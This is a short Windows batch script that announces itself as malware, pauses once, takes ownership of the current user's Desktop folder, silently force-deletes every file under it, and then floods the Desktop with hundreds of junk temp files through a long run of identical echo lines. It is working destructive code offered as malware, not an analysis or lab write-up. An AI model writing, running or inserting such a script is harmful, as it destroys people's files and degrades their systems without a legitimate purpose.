@echo off
echo Hey, What your executing is malware so if you agree
pause
takeown /f C:\Users\%USERNAME%\Desktop
del /q /f /s %USERPROFILE%\Desktop
cd %USERPROFILE%\Desktop
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
